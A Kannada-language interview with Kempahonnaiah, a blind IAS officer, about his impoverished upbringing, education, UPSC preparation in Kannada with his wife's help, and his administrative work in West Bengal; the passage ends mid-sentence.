ಅಂಧ ಐಎಎಸ್ ಅಧಿಕಾರಿ ಕೆಂಪಹೊನ್ನಯ್ಯ

ಕಡುಬಡತನದಲ್ಲಿ ಬೆಳೆದ ಕೆಂಪಹೊನ್ನಯ್ಯ ಅವರು ದೃಷ್ಟಿವಿಕಲಚೇತನರು; ಐಎಎಸ್ ಪರೀಕ್ಷೆಯನ್ನು ಕನ್ನಡದಲ್ಲೇ ಬರೆದು, 340ನೇ ರಾಂಕ್ಗಳಿಸಿ, ಪ್ರಸ್ತುತ ಪಶ್ಚಿಮ ಬಂಗಾಲದಲ್ಲಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸುತ್ತಿದ್ದಾರೆ. ಈ ಸಂದರ್ಶನದಲ್ಲಿ ಅವರ ಸಾಧನೆಯ ಹಾದಿ ಬಿಚ್ಚಿಕೊಳ್ಳುತ್ತದೆ.

ಊರು, ತಂದೆ-ತಾಯಿ, ಬೆಳೆದು ಬಂದ ಪರಿಸರ?

ತುಮಕೂರು ಜಿಲ್ಲೆ, ಕುಣಿಗಲ್ ತಾಲೂಕು, ಚೌಡನಕುಪ್ಪೆ ಗ್ರಾಮ. ತಂದೆ ಹೊನ್ನಯ್ಯ, ತಾಯಿ ಮುನಿಯಮ್ಮ. ಕಡುಬಡತನದಲ್ಲಿದ್ದ ರೈತಾಪಿ ಕುಟುಂಬ. ನಾನು 7ನೇ ತರಗತಿಯಲ್ಲಿದ್ದಾಗ ತಂದೆ ತೀರಿಕೊಂಡರು. ತಾಯಿಯೇ ನಮ್ಮನ್ನ ಬೆಳೆಸಿದ್ದು, ಓದಿಸಿದ್ದು. ನಾನು 4ನೇ ತರಗತಿಯಲ್ಲಿದ್ದಾಗ ಕಣ್ಣು ಕಳೆದುಕೊಂಡ ಕಾರಣ ತಂದೆ-ತಾಯಿ ಮುಖ ಈಗಲೂ ನೆನಪಿದೆ.

ಸಂಜೆವರೆಗೂ ಹೊಲದಲ್ಲಿ ಕೆಲಸಮಾಡಿ, ಸಂಜೆ ಸಾರಾಯಿ ಕುಡುಕೊಂಡು ಮನೆಗೆ ಬಂದು ಅಮ್ಮನಿಗೋ, ಮತ್ತಿನ್ಯಾರಿಗೋ ಬೈಕೊಂಡು ಮಲಗೋದು ಅಪ್ಪನ ದಿನಚರಿ. ನನಗೆ ದೃಷ್ಟಿ ಹೋದಾಗ ಆಸ್ಪತ್ರೆಗಿಂತ ಅವರು ದೇವಾಲಯಗಳಿಗೆ ತಿರುಗಿದ್ದೇ ಹೆಚ್ಚು. ಶಾಸ್ತ್ರ, ಕಣಿ ಹೀಗೆ ಯಾರು ಏನ್ಹೇಳಿದರೂ ಅದನ್ನ ಮಾಡೋರು. ತಾಯಿ ಅಕ್ಷರ ಕಲಿತಿಲ್ಲವಾದರೂ ಜಾಣೆ. ಕೂಲಿ ಮಾಡಿ ನಮ್ಮನ್ನೆಲ್ಲ ಓದಿಸಿದಳು. ನನಗೆ ದೃಷ್ಟಿ ಹೇಗೆ ಹೋಯ್ತು ಅನ್ನೋದು ನೆನಪಿಲ್ಲ. ಈಗ ರೆಟಿನಾ ಡಿಟ್ಯಾಚ್‍ಮೆಂಟ್ ಅಂತಾ ವೈದ್ಯರು ಹೇಳಿದ್ದರಿಂದ ಗೊತ್ತಾಗಿದೆ. ಬೆಂಗಳೂರಿನ ಮಿಂಟೋ ಆಸ್ಪತ್ರೆ ವೈದ್ಯರೊಬ್ಬರ ಸಲಹೆ ಮೇರೆಗೆ ನನ್ನನ್ನು ವಿದ್ಯಾಭ್ಯಾಸಕ್ಕಾಗಿ ಮೈಸೂರಿಗೆ ಕರೆದೊಯ್ದರು. ನಾನು 1ನೇ ತರಗತಿಗೆ ತಿಲಕ್ ನಗರದಲ್ಲಿರುವ, ಸರಕಾರಿ ಅಂಧಮಕ್ಕಳ ಪಾಠಶಾಲೆಗೆ ಸೇರಿದಾಗ ನನಗೆ ಸುಮಾರು 10 ವರ್ಷ. ಹಾಸ್ಟೆಲ್ ಊಟ ಸರಿಹೋಗ್ತಿರಲಿಲ್ಲ. ಒಂದು ಬಾರಿ ಗೋಡೆ ಹಾರಿ ಊರಿಗೆ ಓಡಿದ್ದು, ನಂತರ ಸಿಕ್ಕಿ ಬಿದ್ದದ್ದು ಇನ್ನೂ ನೆನಪಿದೆ. ಅದೆಲ್ಲವೂ ಮುಂದೆ ನನಗೆ ಸ್ವಾವಲಂಬಿ ಆಗಲು ತುಂಬಾ ಸಹಕಾರಿಯಾಯ್ತು. ಈಗ ತಾಯಿಗೆ 70 ವರ್ಷ.

ವಿದ್ಯಾಭ್ಯಾಸದ ದಾರಿ?

10ನೇ ತರಗತಿವರೆಗೂ ಅಂಧ ಮಕ್ಕಳ ಶಾಲೆಯಲ್ಲಿ ಆಯ್ತು. ನಂತರ ಕುಣಿಗಲ್ಲಿನಲ್ಲಿ ಕಣ್ಣಿದ್ದವರೊಂದಿಗೆ ನನ್ನ ಕಲಿಕೆ ಮುಂದುವರಿಯಿತು. ಆಗ ಮಿತ್ರಜ್ಯೋತಿ ಅನ್ನೋ ಸಂಸ್ಥೆಯ ಪರಿಚಯವಾಯಿತು. ಅವರು ಅಂಧ ಮಕ್ಕಳಿಗೆ ಪಠ್ಯಗಳನ್ನ ಆಡಿಯೋ ಮಾಡಿ ಕೊಡ್ತಿದ್ದರು. ವಿದ್ಯಾರ್ಥಿ ಜೀವನದುದ್ದಕ್ಕು ಮಿತ್ರಜ್ಯೋತಿ ನನ್ನ ಜ್ಞಾನಾರ್ಜನೆಗೆ ಸಹಾಯ ಮಾಡಿತು. ನಂತರ ಮತ್ತೆ ಮೈಸೂರಿನ ಮಹಾರಾಜಾ ಕಾಲೇಜಿನಲ್ಲಿ ಡಿಗ್ರಿ ಸಾಗಿತು. ಆಗ ಮೈಸೂರಿನಲ್ಲಿ ಹೆಲನ್ ಕೆಲರ್ ಡಿಪ್ಲೋಮಾ ಆರಂಭವಾಯಿತು. ಇದನ್ನು ಮುಗಿಸಿದರೆ ಕೆಲಸ ಸಿಗುವುದೆಂಬ ಸುದ್ದಿ ಹಬ್ಬಿತು. ಅಮ್ಮ ಕೂಲಿ ಮಾಡಿ ನೂರೋ, ಇನ್ನೂರೋ ಕೊಡ್ತಿದ್ರು. ಯಾರ್ಯಾರ್ದೋ ಪ್ಯಾಂಟು, ಶರ್ಟುಗಳನ್ನು ಹೊಲಿಗೆ ಹಾಕಿ ನನಗೆ ಕೊಡ್ತಿದ್ದರು. ಅದೇ ಸಮಯದಲ್ಲಿ ಎಂಎ ಕೂಡ ಸೇರಿಕೊಂಡು ಡಿಪ್ಲೋಮಾ ಮತ್ತು ಎಂಎ ಎರಡನ್ನೂ ಮಾಡಿದೆ. ನಂತರ ಉಪನ್ಯಾಸಕರ ನೇಮಕಾತಿಯ ಸ್ಪರ್ಧಾತ್ಮಕ ಪರೀಕ್ಷೆ ಬರೆದು ಆಯ್ಕೆಯಾಗಿ ಉಪನ್ಯಾಸಕನಾಗಿ ಕೆಲಸ ಅರಂಭಿಸಿದೆ. ನಂತರ ಪಿಹೆಚ್‍ಡಿ ಮಾಡುವ ಯೋಚನೆ ಬಂತು. ಅದಕ್ಕೆ ಯುಜಿಸಿ ಫೆಲೋಶಿಪ್ ಕೂಡ ದೊರೆಯಿತು. ಎಂಫಿಲ್ ಕೂಡ ಮಾಡಿದೆ. ಬಿಎಡ್ ಕೂಡ ಡಿಸ್ಟಿಂಕ್ಷನ್‍ನಲ್ಲಿ ಆಯಿತು.

ಯು.ಪಿ.ಎಸ್.ಸಿ. ಪರೀಕ್ಷೆ ಬರೆಯುವ ಯೋಚನೆ ಹೇಗೆ ಬಂತು? ಪ್ರೇರಣೆ ಏನು?

ಐಎಎಸ್ ಬಗ್ಗೆ ಕಲ್ಪನೇನೆ ಇರಲಿಲ್ಲ. ಆಗ ಹೊಟ್ಟೆಪಾಡಿಗಾಗಿ ಏನಾದರೊಂದು ಕೆಲಸ ತಗೋಬೇಕು, ಅದಕ್ಕಾಗಿ ಓದಬೇಕು ಅನ್ನೋದಷ್ಟೇ ನನ್ನ ಗುರಿಯಾಗಿತ್ತು. ನಾನು ಉಪನ್ಯಾಸಕನಾಗಿ ಸೇರಿದ ಮೇಲೆ ಕೆಪಿಎಸ್‍ಸಿ ಪರೀಕ್ಷೆ ಬರೆದೆ. ಮೊದಲಬಾರಿ ಶೇ.50ರಷ್ಟು ಅಂಕ ಬಂದಿತ್ತು, ಯಾವುದೇ ಪೋಸ್ಟಿಂಗ್ ಸಿಗಲಿಲ್ಲ. 2011ರಲ್ಲಿ ಎರಡನೇ ಬಾರಿ ಪರೀಕ್ಷೆ ಬರೆದು ತೇರ್ಗಡೆಯಾಗಿ, ತಹಶೀಲ್ದಾರ್ ಆಗಿ ಆಯ್ಕೆಯಾದೆ. ಆದರೆ ಆ ಸಮಯದಲ್ಲಿ ಭ್ರಷ್ಟಾಚಾರ ಆಗಿದೆ ಅಂತ ಪೋಷ್ಟಿಂಗ್ ರದ್ದಾಯಿತು. 2006-07ರಲ್ಲಿ ಉತ್ತರಪ್ರದೇಶದ ಕೃಷ್ಣ ಗೋಪಾಲ್ ತಿವಾರಿ ಎಂಬ ಅಂಧರು ಐಎಎಸ್ ಮಾಡಿದ ಸುದ್ದಿಯನ್ನ ನನ್ನ ಮಡದಿಯಾಗಲಿದ್ದ ಅಚಿಂತಾ ಓದಿ ಹೇಳಿದರು. ಕೆಪಿಎಸ್‍ಸಿ ಬರೆದಾದ ಮೇಲೆ ಆತ್ಮವಿಶ್ವಾಸವೂ ಹೆಚ್ಚಿತ್ತು. ಅದೇ ಯುಪಿಎಸ್‍ಸಿ ಬರೆಯಲು ಪ್ರೇರಣೆಯಾಯಿತು. 2013ರಿಂದ ಸತತವಾಗಿ ಅಭ್ಯಾಸ ಆರಂಭವಾಯಿತು. 2017ರಲ್ಲಿ 340ನೇ ರ್ಯಾಂಕಲ್ಲಿ ತೇರ್ಗಡೆಯಾದೆ.

ಕನ್ನಡದಲ್ಲಿ ಪರೀಕ್ಷೆ ಬರೆಯೋದು ಸುಲಭವೆ? ತೊಂದರೆಗಳೇನು?

ಅದು ಸುಲಭ, ಇದು ಸುಲಭ ಅಂತ ಹೇಳೋದು ತಪ್ಪು. ಯಾರಿಗೆ ಯಾವ ಭಾಷೆಯಲ್ಲಿ ಹಿಡಿತವಿದೆ ಅನ್ನೋದರ ಮೇಲೆ ಸುಲಭ, ಕಷ್ಟ ನಿರ್ಧಾರ ಆಗುತ್ತೆ. ಇವತ್ತು ಭಾರತದ 22 ಭಾಷೆಗಳಲ್ಲಿ ಕೇಂದ್ರ ಲೋಕಸೇವಾ ಆಯೋಗದ ಪರೀಕ್ಷೆ ಬರೆಯಲು ಅವಕಾಶ ಇದೆ. ಕನ್ನಡದಲ್ಲಿ ಬರಿಯೋದಕ್ಕೆ ಖಂಡಿತಾ ತೊಂದರೆ ಇಲ್ಲ. ನನ್ನ ಬ್ಯಾಚಲ್ಲಿ 6 ಜನ ಕನ್ನಡದಲ್ಲಿ ಬರೆದಿದ್ದೇವೆ. ಯುಪಿಎಸ್‍ಸಿ ಪ್ರಶ್ನೆ ಪತ್ರಿಕೆಗಳು ಹಿಂದಿ-ಇಂಗ್ಲಿಷ್‍ನಲ್ಲಿರುತ್ತವೆ. ಉತ್ತರ ಮಾತ್ರ ನೀವು ಆಯ್ಕೆ ಮಾಡ್ಕೊಳೋ ಭಾಷೇಲಿ ಬರೀಬೇಕು.

ಪ್ರಶ್ನೆ ಅರ್ಥ ಮಾಡ್ಕೋಬೇಕು ಅಂದ್ರೆ ಹಿಂದಿ ಅಥವಾ ಇಂಗ್ಲಿಷ್ ಭಾಷೆ ಗೊತ್ತಿರಬೇಕು. 10, 15, 20 ಅಂಕಗಳ ಪ್ರಶ್ನೆಗಳು 125 ಅಂಕಗಳ ಪ್ರಬಂಧ ಹೀಗೆ ಎಲ್ಲದಕ್ಕೂ ಎಷ್ಟು ಬರೀಬೇಕು ಎಂಬುದನ್ನ ಅಭ್ಯಾಸ ಮಾಡಬೇಕು. ಯುಪಿಎಸ್‍ಸಿಗೆ ಅಂತಾನೆ ಯಾವ ಪಠ್ಯವೂ ಇಲ್ಲ. ಅದಕ್ಕೆ ಪೂರಕವಾಗಿ ಸಾಕಷ್ಟು ಪಠ್ಯಗಳು ಕನ್ನಡದಲ್ಲಿ ಲಭ್ಯವಿವೆ. 6 ರಿಂದ 10ನೇ ತರಗತಿಯ ಪಠ್ಯಗಳು, ಡಿಗ್ರಿಯಲ್ಲಿ ಓದುವ ಪಠ್ಯಗಳು ಎಲ್ಲವೂ ಐಎಎಸ್ ಪರೀಕ್ಷೆಗೆ ಸಹಾಯವಾಗುತ್ತವೆ. ಸಮಾಜವಿಜ್ಞಾನ, ರಾಜ್ಯಶಾಸ್ತ್ರ, ಸಮಾಜಶಾಸ್ತ್ರ, ಇತಿಹಾಸ, ಅರ್ಥಶಾಸ್ತ್ರ ಹೀಗೆ ಎಲ್ಲವನ್ನೂ ತಳಮಟ್ಟದಲ್ಲಿ ಓದುಕೊಳ್ಳಬೇಕು. ಇವುಗಳನ್ನು ಕನ್ನಡದಲ್ಲಷ್ಟೇ ಅಲ್ಲದೇ ಇಂಗ್ಲಿಷ್ ಅಥವಾ ಹಿಂದಿ ಭಾಷೆಗಳಲ್ಲೂ ಓದಿಕೊಳ್ಳಬೇಕು. ಹೀಗಾದಾಗ ಮಾತ್ರ ಪ್ರಶ್ನೆ ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು ಸುಲಭವಾಗುತ್ತೆ.

ಇದಕ್ಕೆಲ್ಲಾ vision.in, byjus.com, clearias.com  ಮುಂತಾದ ವೆಬ್‍ಸೈಟ್ಸ್‍ಗಳಿವೆ. insightsonindia.com ಅಂತ ಬೆಂಗಳೂರಿನದೇ ಆದ ವೆಬ್‍ಸೈಟ್ ಇದೆ. ಇವೆಲ್ಲ ಐಎಎಸ್ ತರಬೇತಿಗೆ ಮಾರ್ಗದರ್ಶನ ನೀಡ್ತವೆ. ಮುಖ್ಯ ಪರೀಕ್ಷೇಲಿ 500 ಅಂಕಗಳ ಐಚ್ಛಿಕ ವಿಷಯವನ್ನು ನಾವು ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳಬೇಕು. ನಾನು ಕನ್ನಡ ಸಾಹಿತ್ಯವನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡಿದ್ದೆ. ಈ ಪತ್ರಿಕೆಯ ಪ್ರಶ್ನೆಗಳು ಮಾತ್ರ ನಾವು ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡ ಭಾಷೆಯಲ್ಲಿರುತ್ತವೆ. ನಿಮ್ಮ ಆಯ್ಕೆ ಸೋಸಿಯಾಲಜಿ, ಎಕನಾಮಿಕ್ಸ್ ಮುಂತಾದವು ಆಗಿದ್ದರೆ, ನೀವು ಉತ್ತರವನ್ನು ಕಡ್ಡಾಯವಾಗಿ ಇಂಗ್ಲಿಷಿನಲ್ಲೇ ಬರೆಯಬೇಕು.

ಕಣ್ಣಿಲ್ಲದಿದ್ದರೂ ಪರೀಕ್ಷೆ ಬರೆಯುವಲ್ಲಿ ನಿಮ್ಮ ತಯಾರಿ ಹೇಗಿತ್ತು?

ದೃಷ್ಟಿಹೀನರಿಗೆ ಇದೊಂದು ಸವಾಲು. ದಾರಿ ದುರ್ಗಮವಾಗಿದೆ ಆದರೆ ಅಸಾಧ್ಯವಲ್ಲ. ನಮ್ಮ ಪಠ್ಯಗಳನ್ನೆಲ್ಲ ಆಡಿಯೋ ರೂಪದಲ್ಲಿ ಮಿತ್ರಜ್ಯೋತಿ ಅಂತಹ ಸಂಸ್ಥೆಗಳು, ಸ್ನೇಹಿತರಿಂದ ಪಡೀತಿದ್ದೆ. ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ನನ್ನ ಮಡದಿ ಅಚಿಂತಾ ಅವರು ಓದಿ ಹೇಳ್ತಿದ್ರು. ನನ್ನ ಅತ್ತೆ ಪದ್ಮಾ ವಿಲಿಯಂ, ಮೈಸೂರು ವಿದ್ಯಾರಣ್ಯಪುರದ ಪಿ.ವಿ.ವಸುಮತಿ ಕೂಡ ಬಹಳಷ್ಟು ಪಠ್ಯ ಓದಿ ಹೇಳಿದ್ದಾರೆ. ಸಮಾನ ಮನಸ್ಕರು, ಯುಪಿಎಸ್‍ಸಿ ಪರೀಕ್ಷೆ ಬರೀತಾ ಇರೋವ್ರ ಜೊತೆ ಚರ್ಚೆ ಇತ್ಯಾದಿಗಳನ್ನ ಮಾಡ್ತಿದ್ದೆ. ಮುಖ್ಯಾಂಶಗಳನ್ನ ಬ್ರೈಲಲ್ಲಿ ಬರೆದುಕೊಳ್ತಾ ಇದ್ದೆ. ಪ್ರಸಕ್ತ ವಿದ್ಯಮಾನಗಳ ಬಗ್ಗೆ ವರ್ತಮಾನ ಪತ್ರಿಕೆಗಳನ್ನು ಅಚಿಂತಾ ಓದಿ ಹೇಳ್ತಾ ಇದ್ದರು. ಈಗ ಮೊಬೈಲ್‍ಗಳು ಪತ್ರಿಕೆಗಳನ್ನು ಓದಿ ಹೇಳುವಷ್ಟು ತಂತ್ರಜ್ಞಾನ ಮುಂದುವರೆದಿದೆ. ಪ್ರೆಸ್ ಇನ್ಫಾರ್ಮೆಷನ್ ಬ್ಯೂರೋದ ಆಪ್ ಇನ್‍ಸ್ಟಾಲ್ ಮಾಡ್ಕೊಂಡ್ರೆ ಓದಿ ಹೇಳುತ್ತೆ. ಟಿವಿಗಳಿವೆ. ಇವುಗಳಿಂದ ಈಗ ದೃಷ್ಟಿವಿಕಲಚೇತನರಿಗೆ ಆಗಿನಷ್ಟು ಕಷ್ಟ ಇಲ್ಲ.

ಐಎಎಸ್ ಮಾಡಲು ಮಡದಿಯೇ ಕಾರಣ!

ನನಗೆ ಓದಬೇಕು ಅನ್ನೋ ಹಂಬಲ ಬಿಟ್ಟರೆ ಮದುವೆ ಬಗ್ಗೆ ಯೋಚನೇನೆ ಇರಲಿಲ್ಲ. ಮೊದಲ ವರ್ಷದ ಬಿಎ ಪರೀಕ್ಷೆಯ ಸಮಯ. ಪರೀಕ್ಷೆ ಮುಗಿಸಿಕೊಂಡು ಮಹಾರಾಜಾ ಕಾಲೇಜಿನಿಂದ ಮೈಸೂರಿನ ಸಿಟಿ ಬಸ್‍ಸ್ಟ್ಯಾಂಡ್‍ಗೆ ಬಂದೆ. ಬಸ್ ಕಾಯಲು ಅಲ್ಲಿರುವ ಬೆಂಚ್ ಮೇಲೆ ಕುಳಿತುಕೊಳ್ಳಲು ಹೋದೆ. ಆದರೆ ಆ ಬೆಂಚ್ ಮೇಲೆ ಯಾರೋ ಎಲೆ ಅಡಿಕೆ ತಿಂದು ಉಗಿದಿದ್ದರು. ಕಣ್ಣಿಲ್ಲದ ಕಾರಣ ನನಗೆ ಗೊತ್ತಾಗಲಿಲ್ಲ. ಇನ್ನೇನು ಕುಳಿತುಕೊಳ್ಳಬೇಕು ಎನ್ನುವಾಗ ಒಬ್ಬ ಹುಡುಗಿ ನನ್ನನ್ನ ಕೈಹಿಡಿದು ವಿಷಯ ತಿಳಿಸಿ ಬೇರೊಂದು ಕಡೆ ಕೂರಿಸಿದಳು. ಮಾತುಕತೆ ಬೆಳೆಯಿತು. ಪರಿಚಯ ಮಾಡಿಕೊಂಡೆವು. ಅವರು ಬುದ್ಧಿಮಾಂದ್ಯ ಮಕ್ಕಳ ಮೈತ್ರಿ ಶಾಲೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತಿದ್ದರು. ಸಹಾಯ ಬೇಕಿದ್ದರೆ ಕೇಳಿ ಎಂದು ಲ್ಯಾಂಡ್‍ಲೈನ್ ನಂಬರ್ ಕೊಟ್ಟರು. ಮುಂದೆ ಡಿಪ್ಲೋಮಾ ಪರೀಕ್ಷೆ ಬರೆಯಲು ನನಗೆ ಯಾರಾದರೂ ಬೇಕಿತ್ತು. ಇವರಿಗೆ ಕರೆ ಮಾಡಿದಾಗ ತಕ್ಷಣ ಸಂತೋಷದಿಂದ ಒಪ್ಪಿಕೊಂಡರು.

ಮುಂದೆ ನಮ್ಮ ಸ್ನೇಹ ಮುಂದುವರೆದು, ಆರೇಳು ತಿಂಗಳ ನಂತರ ನಿಮ್ಮನ್ನು ಇಷ್ಟಪಟ್ಟಿದ್ದೇನೆ, ನಿಮ್ಮನ್ನು ಮದುವೆಯಾಗಲು ಉತ್ಸುಕಳಾಗಿದ್ದೇನೆ ಅಂತ ತಿಳಿಸಿದರು. ನನ್ನ ಪರಿಸ್ಥಿತಿಯನ್ನು ವಿವರಿಸಿ, ಕಣ್ಣಿದ್ದವರನ್ನೇ ಮದುವೆ ಮಾಡಿಕೊಳ್ಳಲು ಹೇಳಿದೆ. ಆದರೆ ಅವರು ನನ್ನನ್ನೇ ಮದುವೆ ಮಾಡಿಕೊಳ್ಳಲು ನಿರ್ಧರಿಸಿ ನನ್ನ ತಾಯಿಯವರನ್ನೂ ಒಪ್ಪಿಸಿದರು. ನನಗೋಸ್ಕರ ಬ್ರೈಲ್ ಕಲಿತರು. ನನ್ನ ವಿದ್ಯಾಭ್ಯಾಸದ ಬೆಳವಣಿಗೆಗೆ ಒಂದು ತಿರುವು ಸಿಕ್ಕಿದ್ದು ಇಲ್ಲಿಯೇ. ಹಲವಾರು ಪುಸ್ತಕಗಳನ್ನು ತಂದು ಓದಿ ಹೇಳೋರು. ನಂತರದಲ್ಲಿ ಅವರೊಡನೆ ಮದುವೆಯೂ ಆಯಿತು. ಅಚಿಂತಾ ಅವರು ಈ ಮೂಲಕ ನನ್ನ ಮಡದಿಯಾಗಿ ನನ್ನ ಜೀವನದಲ್ಲಿ ಬಂದರು. ನಾನು ಇಂದು ಐಎಎಸ್ ಮಾಡಿದ್ದೇನೆಂದರೆ ಅವರಿಂದಲೇ. ಈಗ ನಮಗಿಬ್ಬರು ಮಕ್ಕಳಿದ್ದಾರೆ.

ಆಸಕ್ತಿಯುಳ್ಳ ಅಭ್ಯರ್ಥಿಗಳಿಗೆ ಆತ್ಮವಿಶ್ವಾಸ ಹೆಚ್ಚಿಸಲು ನಿಮ್ಮ ಸಲಹೆ ಏನು?

ಯುಪಿಎಸ್‍ಸಿ ಮಾಡಬೇಕು ಅನ್ನೋದನ್ನ ಹೈಸ್ಕೂಲು, ಪಿಯುಸಿ ಇರೋವಾಗಲೇ ತೀರ್ಮಾನ ಮಾಡೋದು ಒಳ್ಳೇದು. ಬೇಗ ಆಯ್ಕೆ ಆಗೋ ಅವಕಾಶ, ಒಳ್ಳೇ ಸೇವಾವಧಿ ಸಿಗುವ ಸುವರ್ಣಾವಕಾಶ ಇರುತ್ತೆ. ಪಿಯೂಸಿಯಿಂದ ತಯಾರಿ ಆರಂಭಿಸಿದರೆ ಡಿಗ್ರಿ ಮುಗಿದ ತಕ್ಷಣ ಪರೀಕ್ಷೆ ಕೊಡೋಕೆ ಸಾಧ್ಯವಾಗುತ್ತೆ. ಪ್ರೇರಣೆ ಅನ್ನೋದು ಅವರವರ ವಿಚಾರಕ್ಕೆ ಬಿಟ್ಟಿದ್ದು. ಅದು ಶಾಶ್ವತವಾಗಿ ನಮ್ಮ ಮನಸಿನಲ್ಲಿ ಬೇರೂರಬೇಕು. ಯಾರೊ ಹೇಳಿದ ಮಾತುಗಳು ನಮಗೆ ಆರಂಭಿಕ ಪ್ರೇರಣೆ ಕೊಡಬಹುದು. ಆದರೆ ಪ್ರೇರಣೆ ಅನ್ನೋದನ್ನ ನಾವೇ ನಮ್ಮ ಮನಸ್ಸಿನಲ್ಲಿ ಹುಟ್ಟಾಕಿಕೊಳ್ಳಬೇಕು.
ಹಲವಾರು ಬಾರಿ ಓದಿಓದಿ, ಪರೀಕ್ಷೆ ಬರೆದು ಬರೆದು ಯಶಸ್ವಿಯಾಗದಿದ್ದಾಗ ಆತ್ಮವಿಶ್ವಾಸ ಕುಗ್ಗುತ್ತದೆ. ನಾನು ಯಶಸ್ವಿಯಾದಾಗ, ನನ್ನ ಅಪ್ಪ-ಅಮ್ಮ, ನನ್ನ ಸ್ನೇಹಿತರು, ನನ್ನ ಊರು, ನನ್ನ ನಾಡು, ನನ್ನ ಬಗ್ಗೆ ಹೇಗೆ ಹಮ್ಮೆಯಿಂದ ಮೆರೆಯಬಹುದು ಅನ್ನೋದನ್ನ ನೆನೆಸಿಕೊಳ್ಳಿ. ಆತ್ಮವಿಶ್ವಾಸ ಮತ್ತೆ ಹುಟ್ಟಿಬರುತ್ತೆ. ನಾನು ಐಎಎಸ್ ಆದಾಗ ನಮ್ಮೂರಿನಲ್ಲಿ 2000 ಜನ ಸೇರಿ ಮೆರವಣಿಗೆ ಮಾಡಿ ಸಂಭ್ರಮಿಸಿದರು. ಇಂಥದ್ದನ್ನೆಲ್ಲಾ ನೆನೆಸಿಕೊಂಡ್ರೆ ಆಗಾಗ ಮಂಕಾಗೋ ಆತ್ಮವಿಶ್ವಾಸ ಉಜ್ವಲವಾಗುತ್ತೆ.

ಆಡಳಿತ ನಿರ್ವಹಿಸುವಲ್ಲಿ ನೀವೆದುರಿಸಿದ ಸವಾಲುಗಳು?

ದೃಷ್ಟಿ ಇಲ್ಲದವರಿಗೆ ಯುಪಿಎಸ್‍ಸಿ ಮಾಡೋದು ಒಂದು ಸವಾಲಾದರೆ, ವೃತ್ತಿಪರತೆಯಲ್ಲಿ ಆಡಳಿತ ನಡೆಸೋದು ಇನ್ನೊಂದು ದೊಡ್ಡ ಸವಾಲು. ತಂತ್ರಜ್ಞಾನದ ಮೊರೆ ಹೋದರೆ ಸ್ವಲ್ಪ ಮಟ್ಟಿಗೆ ಎದುರಿಸಬಹುದು. ಎಲ್ಲ ಕಡತಗಳನ್ನು ಲ್ಯಾಪ್‍ಟಾಪ್‍ಗೆ ಹಾಕಿ ಓದಿಸಿಕೊಂಡು ಪರಿಶೀಲಿಸುವಂಥ, ಒಂದು ಅರ್ಜಿಯನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಿ ಹಾಕಿದಾಗ ಓದಿ ಹೇಳುವಂಥ ಸೌಲಭ್ಯವನ್ನು ತಂತ್ರಜ್ಞಾನ ನಮಗೆ ಕೊಟ್ಟಿದೆ.

ಕಷ್ಟಗಳಿವೆ, ಮುಳ್ಳುಗಳಿವೆ. ಹೂವಿನ ಹಾಸಿಗೆಯಂತೂ ಅಲ್ಲ. ಐಎಎಸ್ ಅಂದ್ರೆ ಒಂದು ಪ್ರದೇಶಕ್ಕೆ ಮುಖ್ಯಸ್ಥ. ಎಲ್ಲರೊಂದಿಗೆ ಸಮನ್ವಯ ಸಾಧಿಸೋದು, ಕೆಲಸಕ್ಕೆ ಎಲ್ಲರನ್ನು ಹುರಿದುಂಬಿಸೋದು, ಉಸ್ತುವಾರಿ ನಡೆಸುವಲ್ಲಿ ಎದುರಾಗುವ ಸಮಸ್ಯೆಗಳ ಅರಿವು ಹೀಗೆ ಎಲ್ಲವೂ ಒಂದೊಂದು ಸವಾಲುಗಳೇ. ಇವೆಲ್ಲವುಗಳನ್ನ ಪ್ರಾಮಾಣಿಕತೆಯಿಂದ ಎದುರಿಸುತ್ತಾ ಹೋದಾಗ, ಆ ಅನುಭವವೇ ನನಗೊಂದು ಪಾಠವಾಯಿತು. ನಂಬಲರ್ಹ ವ್ಯಕ್ತಿಗಳನ್ನ ಪಕ್ಕದಲ್ಲಿಟ್ಕೋಂಡಿದೀನಿ. ಅದರಂತೆ ಐಎಎಸ್ ಮಾಡಿದ ಇನ್ನಿತರರು ಸಮಸ್ಯೆಗಳನ್ನು ಬಗೆಹರಿಸಿದ ರೀತಿಗಳ ಬಗ್ಗೆ ಅವರೊಂದಿಗೆ ವ್ಯವಹರಿಸಿ, ಅಧ್ಯಯನ ಮಾಡ್ತಾ ಇದೀನಿ. ಜನ ನಮ್ಮಂಥವರನ್ನ ತುಂಬ ವಿಭಿನ್ನವಾಗಿ ನೋಡ್ತಾರೆ.

ಎಷ್ಟೋ ಜನ ಡಿಸಿಗಳ ಜೊತೆ ವ್ಯವಹರಿಸಿದ ಜನಗಳು, ನಾನು ಬಂದ ನಂತರ ನನ್ನ ಆಡಳಿತಾತ್ಮಕ ಸಲಹೆಗಳನ್ನು ಕೂಲಂಕಷವಾಗಿ ನೋಡ್ತಾರೆ. ಈ ಅನುಭವ ನನಗೆ ಹೂಗ್ಲಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ಆಯ್ತು. ನಾನು ಮೊದಲ ಬಾರಿಗೆ ಅಲ್ಲಿಗೆ ಅಧಿಕಾರ ವಹಿಸಿಕೊಂಡಾಗ ಅಲ್ಲಿ ಜನ ಆಶ್ಚರ್ಯ ಪಟ್ಟರು. “ಸಾಬ್ ಆಂಖೆ ನಹಿ, ಇತನಾ ಬಡಾ ಕಾಮ್ ಕರದಿಯಾ. ಆಪ್ ಕೈಸಾ ಕಾಮ್ ಕರ್‍ರಹೇ ಹೈ” ಅಂತೆಲ್ಲಾ ಹೇಳಿ ನನ್ನ ಕಾರ್ಯಗಳಲ್ಲಿ ಬೆನ್ನೆಲುಬಾಗಿ ನಿಂತರು. ಇಡೀ ಒಂದು ವರ್ಷದಲ್ಲಿ ಅನೇಕ ಹಳ್ಳಿಗಳನ್ನು, ವಿದ್ಯಾಸಂಸ್ಥೆಗಳನ್ನು ಭೇಟಿ ಮಾಡಿದೆ. ಅವರಿಗೆ ಪ್ರೇರಣೆಯಾಗುವಂತೆ ಅನೇಕ ಭಾಷಣಗಳನ್ನು ಮಾಡಿದೆ. ಕೆಲವೊಂದು ಕಡೆ ನನ್ನನ್ನೇ 